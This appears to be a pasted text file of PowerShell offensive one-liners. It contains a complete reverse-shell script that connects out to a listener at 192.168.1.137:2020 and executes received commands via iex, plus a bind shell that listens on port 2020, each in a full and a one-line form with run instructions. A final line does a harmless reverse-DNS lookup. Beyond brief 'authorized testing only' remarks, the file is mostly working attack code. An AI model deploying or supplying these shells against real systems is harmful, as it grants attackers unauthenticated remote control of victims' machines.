opexxx

powershell.txt

REVERSE SHELL — the target connects OUT to the operator's listener (192.168.1.137:2020 in the snippets below), so start the listener first, e.g. `nc -lvp 2020`. Whoever holds the listener gets unauthenticated command execution as the user running the script; authorized testing only.
  3. // reverse_shell.ps1
  4. // how-to run: powershell -c reverse_shell.ps1
  5. $client = New-Object System.Net.Sockets.TCPClient('192.168.1.137',2020);
  6. $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
  7. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  8.     {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
  9.     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  10.     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  11.     $stream.Write($sendbyte,0,$sendbyte.Length);
  12.     $stream.Flush()};
  13. $client.Close()
  15. // one line
  16. $client = New-Object System.Net.Sockets.TCPClient('192.168.1.137',2020);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();
  18. ======
BIND SHELL — the target LISTENS on 0.0.0.0:2020 and hands the first client that connects an unauthenticated shell. Anyone who can reach the port gets it, and inbound connections may be blocked by the host firewall until the port is allowed; use only in an isolated, authorized lab.
  22. // bind_shell.ps1
  23. // how-to run: powershell -c bind_shell.ps1
  24. powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',2020);
  25. $listener.start();
  26. $client = $listener.AcceptTcpClient();
  27. $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
  28. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  29.     {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  30.     $sendback = (iex $data 2>&1 | Out-String );
  31.     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  32.     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  33.     $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
  34. $client.Close();
  35. $listener.Stop()"
  37. // one line
  38. $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',2020);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
  41. ======
  43. Get-Content C:\IP_Address.txt | ForEach-Object {([system.net.dns]::GetHostByAddress($_)).hostname >> c:\hostname.txt}